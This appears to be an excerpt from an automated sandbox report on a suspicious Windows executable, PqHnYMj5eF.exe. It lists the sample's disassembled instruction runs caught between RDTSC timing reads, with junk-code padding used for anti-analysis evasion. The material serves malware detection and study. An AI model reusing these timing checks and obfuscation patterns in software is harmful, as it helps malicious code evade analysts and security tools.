Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71207D8 second address: 7120874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+64h] 0x0000000b pushad 0x0000000c mov ebx, eax 0x0000000e mov eax, 5017730Dh 0x00000013 popad 0x00000014 mov dword ptr [esi+28h], eax 0x00000017 pushad 0x00000018 push ecx 0x00000019 mov dl, 4Dh 0x0000001b pop ecx 0x0000001c mov cl, dh 0x0000001e popad 0x0000001f mov eax, dword ptr [ebx+68h] 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FBCB0ED6604h 0x00000029 adc cx, 7F88h 0x0000002e jmp 00007FBCB0ED65FBh 0x00000033 popfd 0x00000034 call 00007FBCB0ED6608h 0x00000039 pushad 0x0000003a popad 0x0000003b pop eax 0x0000003c popad 0x0000003d mov dword ptr [esi+2Ch], eax 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007FBCB0ED65FDh 0x00000047 or cx, 2D56h 0x0000004c jmp 00007FBCB0ED6601h 0x00000051 popfd 0x00000052 mov dx, si 0x00000055 popad 0x00000056 mov ax, word ptr [ebx+6Ch] 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120874 second address: 712087A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712087A second address: 7120880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120880 second address: 7120884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120884 second address: 71208CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6608h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [esi+30h], ax 0x0000000f jmp 00007FBCB0ED6600h 0x00000014 mov ax, word ptr [ebx+00000088h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FBCB0ED65FAh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71208CB second address: 71208CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71208CF second address: 71208D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71208D5 second address: 7120953 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+32h], ax 0x0000000d jmp 00007FBCB0E4CF70h 0x00000012 mov eax, dword ptr [ebx+0000008Ch] 0x00000018 jmp 00007FBCB0E4CF70h 0x0000001d mov dword ptr [esi+34h], eax 0x00000020 jmp 00007FBCB0E4CF70h 0x00000025 mov eax, dword ptr [ebx+18h] 0x00000028 jmp 00007FBCB0E4CF70h 0x0000002d mov dword ptr [esi+38h], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FBCB0E4CF77h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120953 second address: 712098F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 39C0367Ah 0x00000008 push edx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+1Ch] 0x00000010 jmp 00007FBCB0ED65FDh 0x00000015 mov dword ptr [esi+3Ch], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FBCB0ED6608h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712098F second address: 7120995 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120995 second address: 712099B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712099B second address: 712099F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712099F second address: 7120A88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6608h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+20h] 0x0000000e pushad 0x0000000f mov edi, eax 0x00000011 movzx eax, di 0x00000014 popad 0x00000015 mov dword ptr [esi+40h], eax 0x00000018 jmp 00007FBCB0ED6605h 0x0000001d lea eax, dword ptr [ebx+00000080h] 0x00000023 jmp 00007FBCB0ED65FEh 0x00000028 push 00000001h 0x0000002a jmp 00007FBCB0ED6600h 0x0000002f nop 0x00000030 jmp 00007FBCB0ED6600h 0x00000035 push eax 0x00000036 pushad 0x00000037 mov edx, 279C3914h 0x0000003c mov edi, 668DD280h 0x00000041 popad 0x00000042 nop 0x00000043 jmp 00007FBCB0ED65FFh 0x00000048 lea eax, dword ptr [ebp-10h] 0x0000004b jmp 00007FBCB0ED6606h 0x00000050 nop 0x00000051 pushad 0x00000052 pushfd 0x00000053 jmp 00007FBCB0ED65FEh 0x00000058 sbb si, F328h 0x0000005d jmp 00007FBCB0ED65FBh 0x00000062 popfd 0x00000063 call 00007FBCB0ED6608h 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120B0E second address: 7120B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120B12 second address: 7120B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120B18 second address: 7120B67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 mov eax, 105F0D6Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edi, eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jmp 00007FBCB0E4CF74h 0x00000016 mov edx, eax 0x00000018 popad 0x00000019 pushfd 0x0000001a jmp 00007FBCB0E4CF6Eh 0x0000001f add si, 7168h 0x00000024 jmp 00007FBCB0E4CF6Bh 0x00000029 popfd 0x0000002a popad 0x0000002b test edi, edi 0x0000002d pushad 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120B67 second address: 7120C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ch, 07h 0x00000006 popad 0x00000007 call 00007FBCB0ED65FDh 0x0000000c mov ah, 74h 0x0000000e pop edx 0x0000000f popad 0x00000010 js 00007FBD2129513Ah 0x00000016 pushad 0x00000017 jmp 00007FBCB0ED6606h 0x0000001c pushad 0x0000001d mov eax, 0A1FA227h 0x00000022 mov ax, 39C3h 0x00000026 popad 0x00000027 popad 0x00000028 mov eax, dword ptr [ebp-0Ch] 0x0000002b pushad 0x0000002c mov al, 1Eh 0x0000002e pushfd 0x0000002f jmp 00007FBCB0ED6601h 0x00000034 jmp 00007FBCB0ED65FBh 0x00000039 popfd 0x0000003a popad 0x0000003b mov dword ptr [esi+04h], eax 0x0000003e jmp 00007FBCB0ED6606h 0x00000043 lea eax, dword ptr [ebx+78h] 0x00000046 jmp 00007FBCB0ED6600h 0x0000004b push 00000001h 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FBCB0ED6607h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120C14 second address: 7120C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCB0E4CF74h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120C2C second address: 7120C70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007FBCB0ED65FCh 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007FBCB0ED6600h 0x00000016 lea eax, dword ptr [ebp-08h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FBCB0ED6607h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120C70 second address: 7120CB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBCB0E4CF6Fh 0x00000009 and al, FFFFFFFEh 0x0000000c jmp 00007FBCB0E4CF79h 0x00000011 popfd 0x00000012 movzx eax, dx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e movsx edx, cx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120CF0 second address: 7120CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120CF4 second address: 7120CFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120CFA second address: 7120D22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FBD21294F98h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120D22 second address: 7120D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, si 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120D2A second address: 7120D4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushad 0x0000000f mov eax, 6925E251h 0x00000014 mov bx, ax 0x00000017 popad 0x00000018 mov dword ptr [esi+08h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120D4B second address: 7120DD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBCB0E4CF6Ah 0x00000009 add ax, E5D8h 0x0000000e jmp 00007FBCB0E4CF6Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FBCB0E4CF78h 0x0000001a sub si, 3038h 0x0000001f jmp 00007FBCB0E4CF6Bh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 lea eax, dword ptr [ebx+70h] 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FBCB0E4CF70h 0x00000032 sbb cl, FFFFFF98h 0x00000035 jmp 00007FBCB0E4CF6Bh 0x0000003a popfd 0x0000003b popad 0x0000003c push 00000001h 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FBCB0E4CF75h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120DD5 second address: 7120DDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120DDB second address: 7120E77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007FBCB0E4CF74h 0x0000000e mov dword ptr [esp], eax 0x00000011 pushad 0x00000012 mov ax, 9EEDh 0x00000016 call 00007FBCB0E4CF6Ah 0x0000001b pushfd 0x0000001c jmp 00007FBCB0E4CF72h 0x00000021 or cl, FFFFFFB8h 0x00000024 jmp 00007FBCB0E4CF6Bh 0x00000029 popfd 0x0000002a pop ecx 0x0000002b popad 0x0000002c lea eax, dword ptr [ebp-18h] 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FBCB0E4CF75h 0x00000036 and ax, A456h 0x0000003b jmp 00007FBCB0E4CF71h 0x00000040 popfd 0x00000041 jmp 00007FBCB0E4CF70h 0x00000046 popad 0x00000047 nop 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120E77 second address: 7120E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120E7B second address: 7120E98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120EE6 second address: 7120EEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120EEA second address: 7120EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120EF0 second address: 7120F13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 81h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov di, E7F8h 0x00000011 jmp 00007FBCB0ED6601h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120F13 second address: 7120F43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 mov ax, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007FBD2120B6F6h 0x00000012 jmp 00007FBCB0E4CF75h 0x00000017 mov eax, dword ptr [ebp-14h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120F43 second address: 7120F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120F47 second address: 7120F5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120F5A second address: 7120F60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120F60 second address: 7120F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120F64 second address: 7120F87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a pushad 0x0000000b jmp 00007FBCB0ED65FDh 0x00000010 mov ah, 4Bh 0x00000012 popad 0x00000013 mov dword ptr [esi+0Ch], eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 mov ecx, ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120F87 second address: 7120FC5 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBCB0E4CF6Bh 0x00000008 sub esi, 5EBD23DEh 0x0000000e jmp 00007FBCB0E4CF79h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov edx, 775606ECh 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov ax, 98B5h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120FC5 second address: 7120FD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCB0ED65FDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120FD6 second address: 7120FEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d pushad 0x0000000e pushad 0x0000000f mov dx, ax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120FEA second address: 7120FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 mov eax, 0289E24Dh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120FF6 second address: 7120FFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120FFA second address: 71210A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 lock cmpxchg dword ptr [edx], ecx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FBCB0ED6604h 0x00000012 sub ecx, 1F725098h 0x00000018 jmp 00007FBCB0ED65FBh 0x0000001d popfd 0x0000001e mov ecx, 2C78C64Fh 0x00000023 popad 0x00000024 pop edi 0x00000025 jmp 00007FBCB0ED6602h 0x0000002a test eax, eax 0x0000002c pushad 0x0000002d mov cx, 240Dh 0x00000031 mov dl, ch 0x00000033 popad 0x00000034 jne 00007FBD21294C82h 0x0000003a jmp 00007FBCB0ED6605h 0x0000003f mov edx, dword ptr [ebp+08h] 0x00000042 jmp 00007FBCB0ED65FEh 0x00000047 mov eax, dword ptr [esi] 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007FBCB0ED65FDh 0x00000052 or cx, 08F6h 0x00000057 jmp 00007FBCB0ED6601h 0x0000005c popfd 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71210A8 second address: 71210AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71210AD second address: 7121128 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6607h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx], eax 0x0000000b pushad 0x0000000c mov esi, 5BCE57EBh 0x00000011 pushfd 0x00000012 jmp 00007FBCB0ED6600h 0x00000017 sbb ah, 00000078h 0x0000001a jmp 00007FBCB0ED65FBh 0x0000001f popfd 0x00000020 popad 0x00000021 mov eax, dword ptr [esi+04h] 0x00000024 jmp 00007FBCB0ED6606h 0x00000029 mov dword ptr [edx+04h], eax 0x0000002c jmp 00007FBCB0ED6600h 0x00000031 mov eax, dword ptr [esi+08h] 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 push edx 0x00000038 pop esi 0x00000039 mov bh, 54h 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7121128 second address: 7121159 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+08h], eax 0x0000000c jmp 00007FBCB0E4CF76h 0x00000011 mov eax, dword ptr [esi+0Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7121159 second address: 712115D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712115D second address: 7121163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7121163 second address: 71211B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 mov bx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+0Ch], eax 0x0000000e jmp 00007FBCB0ED6608h 0x00000013 mov eax, dword ptr [esi+10h] 0x00000016 jmp 00007FBCB0ED6600h 0x0000001b mov dword ptr [edx+10h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FBCB0ED6607h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71212DB second address: 71213B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+20h], eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FBCB0E4CF6Ch 0x00000014 jmp 00007FBCB0E4CF75h 0x00000019 popfd 0x0000001a movzx ecx, bx 0x0000001d popad 0x0000001e popad 0x0000001f mov eax, dword ptr [esi+24h] 0x00000022 jmp 00007FBCB0E4CF76h 0x00000027 mov dword ptr [edx+24h], eax 0x0000002a jmp 00007FBCB0E4CF70h 0x0000002f mov eax, dword ptr [esi+28h] 0x00000032 pushad 0x00000033 call 00007FBCB0E4CF6Eh 0x00000038 mov ecx, 1B7327A1h 0x0000003d pop eax 0x0000003e push edi 0x0000003f pushfd 0x00000040 jmp 00007FBCB0E4CF6Ah 0x00000045 adc esi, 7A848F38h 0x0000004b jmp 00007FBCB0E4CF6Bh 0x00000050 popfd 0x00000051 pop esi 0x00000052 popad 0x00000053 mov dword ptr [edx+28h], eax 0x00000056 jmp 00007FBCB0E4CF6Fh 0x0000005b mov ecx, dword ptr [esi+2Ch] 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FBCB0E4CF75h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: 71213B4 second address: 71213DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 call 00007FBCB0ED6603h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [edx+2Ch], ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov eax, 052BEB27h 0x0000001a mov ebx, esi 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: 71213DF second address: 712140F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+30h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBCB0E4CF6Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: 712140F second address: 712145C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dh 0x00000005 mov bx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [edx+30h], ax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FBCB0ED6607h 0x00000018 and si, 3F2Eh 0x0000001d jmp 00007FBCB0ED6609h 0x00000022 popfd 0x00000023 movzx ecx, dx 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: 712145C second address: 7121479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCB0E4CF79h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: 712152C second address: 7121530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: 7121530 second address: 7121536 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: 7121536 second address: 712156B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED6604h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or dword ptr [edx+40h], FFFFFFFFh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBCB0ED6607h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: 712156B second address: 712159F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBCB0E4CF6Fh 0x00000009 add ax, 3ADEh 0x0000000e jmp 00007FBCB0E4CF79h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: 712159F second address: 71215B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop esi 0x00000008 pushad 0x00000009 mov esi, 2E2D28F9h 0x0000000e mov cl, 5Bh 0x00000010 popad 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop edi 0x00000017 mov edx, esi 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exe | RDTSC instruction interceptor: First address: 7110889 second address: 7110890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov al, ADh 0x00000006 popad 0x00000007 rdtsc
